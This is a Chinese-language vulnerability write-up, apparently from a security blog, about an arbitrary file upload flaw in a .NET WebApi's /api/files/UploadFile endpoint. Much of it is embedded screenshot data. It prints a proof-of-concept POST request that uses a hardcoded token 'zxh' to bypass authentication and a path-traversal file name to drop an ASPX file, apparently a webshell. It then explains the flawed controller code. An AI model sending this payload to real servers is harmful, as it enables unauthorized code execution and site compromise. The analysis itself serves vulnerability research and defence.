<p blockindex=12><img src="data:image/png;base64,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
<h1 blockindex=13>0x02 漏洞分析</h1>
<p blockindex=14>首先查看payload</p>
<pre blockindex=15><code class="hljs language-php">POST /api/files/UploadFile HTTP/<span class=hljs-number>1.1</span>
Host: your-ip
Accept-Encoding: gzip
User-Agent: Mozilla/<span class=hljs-number>5.0</span> (Macintosh; Intel Mac OS X <span class=hljs-number>10_14_3</span>) AppleWebKit/<span class=hljs-number>605.1</span>.<span class=hljs-number>15</span> (KHTML, like Gecko) Version/<span class=hljs-number>12.0</span>.<span class=hljs-number>3</span> Safari/<span class=hljs-number>605.1</span>.<span class=hljs-number>15</span>
Content-Type: application/x-www-form-urlencoded
Content-Length: <span class=hljs-number>1926</span>

token=zxh&amp;FileName=/../../manager/a.aspx&amp;pathType=<span class=hljs-number>1</span>&amp;fs=[<span class=hljs-number>60</span>,<span class=hljs-number>37</span>,<span class=hljs-number>64</span>,...]
</code></pre>
<p blockindex=16>通过路由<code>/api/files/UploadFile</code>锁定<code>WebApi.Areas.Api.Controllers.filesController.UploadFile</code>方法</p>
<p blockindex=17><img src=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAA0gAAAC7CAIAAADQaymmAAAgAElEQVR4nO3dv48ex3nA8aGjGLbVhI1jEcTJsmFEBJKDgADBsUjhtzDuHyBYWUTUHMBCViWkkiBWAStZxQFsFBwMV/wHrnpdpCARIIDgBIgCwnZEHqTYjdKcLchwlGLk8dwzz8w+uzv7Y977fkAQ+847OzO773u3z83s7FzZ29tzkf39/Z///OeuqvODG88//s+KBd78p79+9I//YUk0lhC/DNvpRiGncy7NPKAxtWovlzksMbwM1YWXXvnAfTmWz65Qu0Xn+Sw3NddONb1wUOPb2fm5T/FpWnbv+7MWttVTWjgt5caP2Sv3+Yrtzk9hgJV87mr7y7WPOWoAs3lu6QasnXoBSLNV/33nf40aS57zt216zeh1tZvh8qAWHp9P9RNU81vaaSnNrtfnXqU6F31wE1Uah9QD1D3DOfGZT2PfOWufoToVcRuwG2RgV727zjlXt7tuTvPEcKgrd32q/sHV6sJZj0mPYnDJs51YtdN9Bz5WAJfKV5ZuQG/jx2Ht/N/uuT/ZJ/1T3h+RsXtpHrVaYj+oih9rqNFepmjnPENRs33uY8oXzZvtK1qoKG7S4JHxtKjO2msd+wp/3lNLfe4Aerki7rFbv/GBXfwbPJeY/paP+2bKOV3mT397k9JBw1ztyyaK3+yFg+08wPBu31uyLNXFieUScu1MG3CZP/dCYvkA0/T43dzXyVJRnDM3kJoW2JnYeQiWG9dy7XRr+tzV9g/+3AEsSAZ2K588MWd3HQAAQFsaG4qd594pAACAFjUW2AEAACCnvXvsgJxvPP/1ve9cW7oVlT395ce/Pf/d0q0AALThuZdffnnpNgB17H33hW/93e9/8+nZ0g2p5ptXr+/9697TX3yydEMAAG3gAcXYKb/59Ozpr58s3Yq6Xlq6AQCAZnwZ2H344Yd+Y+WzYoGSP//9tRc//+yzz5ZuRzWff/75x0+ffvjhL0LKdrvdbDYLNgmq7XbrN/ynI14C4HfXbHa2x+7grVPn3ON7h2p67q00sdMrD9+LX35w6/W+JYwxUe2h2F4F+p/b3Jm3Uz8j4y+Ff/7ssbvqnHPf//Tqz65+6hO//+lVNXNnBiNfTlxjEJf8s6ufipd9a6/+m3HYd74KH/qcnZ29+uqr89Q4/ptZFn80IrzrtNpAsOI3RD0b8fH6DGlKmrNc/tnZ2fXr1+07TmfBn6+cws9d+gHVPXWbzYbYbh47Oys29+P0+N5h4a0BFfnQ54Nbr/t/ItJKdWaYtHZ7sWpIVyg//MSO/0Wmfkb+l0Lnvv/wtQP3x1Ap/l/1/U+vjgzpQjnxhi82LVmk1KpdCGGxRfWrzna7NUYz8/9+73uwvc7kGHFAY48FB1vqGxI+8c1mo376aXouZ7l8UdeQtlZiPHvTfdPSn8fyCbl//75z7uxsd25TvpxYKxYVzPN3WHN/8NWN29o6dgxwqT7fS3WwTfCfyJtvvukm+3Sa+x3eqMaGYsVfNv7voXiERYy2FAZe1WJFtri6cgnq2KVIDC/9RpxY2C5s9KpdJKZFpcWqB5hmU39Q1VNqT8wZ9ntBjJB2xlvqIGk5US0k5Ow16mrPLL6f4aX6UxAyxD8pndnUitTGxB0DvcbU1LfSRJ9y//59f+FJyzESBx6/TDtOCqeiSleW/aS5Qce7qm9ITBxsryHX8i6PHj26efPm4aFsQ+4bFRs8Cpwynr3cJ5Lq29ryVyvOUD66kC3+0VNVPHsYqbGhWP+990N16u8X8YMhchaKzd1yVxi6jYUh0ZDyysP3xAhpGN+MBzrjXdLtUEiaIkK0ztpFYrl29QDTxrt8N1J65uPzWU4sM47JxsQIaSEac38MyETOzkRRQhpKGnvv1IpU6fczbIsvbbiEqJlz2dLPyBUvPPGomRhBC9cV9YKajpqp+dPuhGGjlupvD/F/7kwO+LqW2U/aAGv7hohDi/U9zPI3ypjfb/vBR/9/KKdv+Snj2ct9Iqn0e1JubeGr5Zzz9yBaji7seHp6qhZobA/mJHvsmBWrMsZ2PnIKKePveEuDrVz4Zak9DTHHm79rfZGefB+WlSOtYZlTxh3Ta0NnfmOxlmwVqd0JLn89qP7p+zMZ/i9nnu3GO/+TlTs5Fqv9hgz420xlL2RYhDFFRDLFz9ewo7N/qfzndXh42GuUlnhuQY0NxbZl5hmyltrjbr9aFc0Z2y14f0YYWu0V3g0Q7/jtF0o54z6AYXVZqF3jtcSzF4V1juDMGfiGC/bgr/1qvyFVPtxcIWrgGELkvuFgEwYc3dQaOnu7p7Gh2E4T/T1tLDY3L9WYOLKHr7P2+K67kbWLzPP8QllDVDdzpfFLcZLLN4e5ej8LYoTOqO/02FxmSzn2unLK3XWTnt4c0V0Xj3MZD3bl35BajN8QNzTUiMsf/00rG/aJWI5uZMs3m82wSRWiXmZOzOPKD37wAxc9oHj9cnfppremqjkL0y8KmQu/s9QZEmK2hOgey81+SGdIpCWn79prT8u01J7LnJ6K8ENb/ow6E9WPw/Ib4eW/+e61v//df3/yX+n8gzhIUhPV9MI8iXLvXXrXXee+au3ffuGvPv6Xr3/4718+oDg+CYXb1XNTiHKJ7uLPi9h2th+EQL0pu3Bztzofwpg/ftdywSifNPVGW2f4DucaYGlV7o7DwsyJKgfrZv+GFG6oz80MKMwYKE8XCH8F5c5n4L9O6Zcw19oBJ991nT2nfdNS5a+EyJweuPHnSC3faeGjsT0Dzh5GajKwW+pPQ6xcCOzStxbpchtPBHZuid+M8U/cOn/6qpyTkYeWu3xW/7BWeGlc/zeklmVP/ph+xylq79ueFX51d1VjgV3dZw1gx+QCu1orTMwvDewWscM/dzt8aHPiNE6t0Je2SL1LtQcWXwZ2wVe/+tXPP/+8bh3/9hdX/vZ/v6hbJpDa++4LX/ner57++snSDalm7y+/939PXnr6i0+WbggAoA3MisVO+ebV7CzLFn3z6vX/WboNAICGXNnb24tf8xw7tOsbz3997zvXlm5FZU9/+fFvz3+3dCsAAG2QgV1Djo6OnHMPHjxYuiEAAACr0PBz7G7fvr2ehzECAAAsruHAzjn35Mnu3CYPAAAwkgzs9vf3q9dxfnCjepkAAAAQWu2xOzk58ffYAQAAwGs1sLtz5w7TJgAAAGIysKv+rBPnHM86AQAAmEGrPXYAAAAQGg7snj17dnJysnQrAAAA1oKVJwAAAHZEwz12AAAAiBHYAQAA7IhW14o9v3bw/MePl24FAADAitBjBwAAsCNaDexW21233W6XbgKqCZ9m0x9r040HAPTCrNg/OXjr9PG9wzTROZemq7bb7Waz6bvXSB+99jR++eL7HWPrH732tDNPrpYBO1apPW6D9+L7eyOb1Ll7+DTVl4vz3zF38WumJrr1NR4AMJFWe+ymoEZ1j+8dPr53GK6Xg4uazovv7/noJGxU0TdeNErLERUV2uMPMJQwskkVz9Ui/DfTkggAuDxaDezOrx3MWZ3lYtlEp4gPj4yx1HqIfr4ZYrL009xsNu2OaTbdeACA3XPi9eVcKzYdwAopYwZV7YNlcY9g2oZhtYuBy0Ie/27YDjuqg5VpYsgfEkVRcflpNrUZoiWWIy03yeVPiJp5mOPjY5Fy9+5dNVHdPXzZ4m9dbhsAgJQM7C6n+KopUsZcROMQLS0wlyjeHdaMuIurEB7FwVMah6nDpuJdUVEYFP7otadqN1saXaXZRDnlCM/YpMIJiWscSY3YcmFcyod04osR3wkw4K4AAMCl0mpgt9pZsWVpBOku9tDkuvH6iqM0tcttcLETZRY7hniusxA1Q/kY0xNSa2x3ZI+dR4ccAGAwGdhd5lmx84j7Y0Ki2kE48gJf6L5yVaOZFbIfWt3bDUf22AEAMFKrkydWyHJ/euGJKi4/0BYSj4+P0+4f1eA71ezp1aVPM4knwMbv2puk5hQVqaco/TTXMDlmcCfuGhoPAJhBq8+xq7ukWDo26jITGsriy2du99w4bCF
<p blockindex=18>在这个方法中接受四个参数，分别为token,fs,FileName,pathType。</p>
<p blockindex=19>首先会经过<code>base.IsAuthorityCheck()</code>进行鉴权</p>
<p blockindex=20><img src="data:image/png;base64,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
<p blockindex=21>这里的<code>byValue</code>通过参数<code>token</code>获得，并且这里判断的内容直接被硬编码，所以直接<code>token=zxh</code>即可<code>return new UserInfo();</code></p>
<p blockindex=22>接着返回UploadFile方法看fs</p>
<pre blockindex=23><code class="hljs language-php">fs = JsonConvert.DeserializeObject&lt;byte[]&gt;(base.getByValue(<span class=hljs-string>"fs"</span>));
</code></pre>
<p blockindex=24><code>JsonConvert.DeserializeObject&lt;byte[]&gt;</code> 是使用 Json.NET 库（Newtonsoft.Json）中的 <code>JsonConvert</code> 类来将 JSON 字符串反序列化为 <code>byte[]</code> 数组的过程。所以这里只需要传入一个数组就可以了</p>
<p blockindex=25><img src="data:image/png;base64,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